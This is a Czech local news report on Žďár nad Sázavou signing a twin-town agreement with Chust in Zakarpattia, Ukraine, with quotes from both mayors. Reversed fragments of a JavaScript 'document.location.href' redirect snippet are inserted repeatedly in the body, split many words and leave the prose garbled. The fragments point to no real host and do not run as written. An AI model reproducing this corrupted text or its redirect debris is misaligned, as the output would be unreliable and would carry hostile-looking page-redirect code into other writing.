Rainbow page separator

Žďár podepsal smlouvu s Chustem, čtvrtým partnerským městem

Neděle, 29. října 2017

Žďár nad Sázavou / Čtvrtým partnerským městem Žďáru nad Sázavou se 27. října stal Chust, okresní měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ležící v Zakarpatské oblasti Ukrajiny. Právě s [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to částí Ukrajiny, kdysi Podkarpatskou Rusí, která před druhou svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou válkou patřila k Československu, pojí Kraj Vysočina už deset let trvající spolupráce. „Vedle spolupráce v oblasti školství, kultury, sportu, případně jednotlivých podniků v obou městech se těšíme především na setkávání konkrétních lidí, Žďáráků, s konkrétními lidmi z Chustu,“ uvedl u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti podpisu smlouvy žďárský starosta Zdeněk Navrátil.
Starosta Chustu Volodymyrij Pavlovič Kaščukov poukázal právě na společnou his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii, kdy před druhou svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou válkou byl Chust, aktuálně zhruba osmadvacetitisícové okresní měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, součástí Československa. „Máme společnou minulost, a jak říkala moje matka, tak při Československé republice byla nejvyšší úroveň demokracie právě u nás v Chustu. Je pro mě velmi příjemné říct, že u nás ve městě jsou objekty, které byly postaveny ještě panem Masarykem, a některé z těch objektů stále naši občané používají,“ řekl starosta Chustu.
Mimo nejnovějšího Chustu pojí Žďár mezinárodní družba také s belgickým Flobecqem, francouzským Cairanne a německým Schmöllnem.